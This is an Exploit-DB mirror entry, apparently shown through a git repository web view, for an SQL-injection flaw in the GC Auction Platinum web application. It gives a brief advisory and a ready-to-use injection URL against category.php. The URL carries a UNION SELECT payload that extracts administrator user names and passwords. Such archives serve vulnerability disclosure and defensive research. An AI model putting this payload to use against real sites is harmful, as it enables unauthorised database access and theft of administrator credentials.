exploit-db-mirror/platforms/php/webapps/32118.txt
Offensive Security 3c0748e57d Updated 03_10_2014
2014-03-10 04:27:56 +00:00

7 lines
No EOL
493 B
Text
Executable file

source: http://www.securityfocus.com/bid/30389/info
GC Auction Platinum is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/category.php?cate_id=-2+UNION+SELECT+1,concat_ws(0x3a,user_name,password),3+from+admin--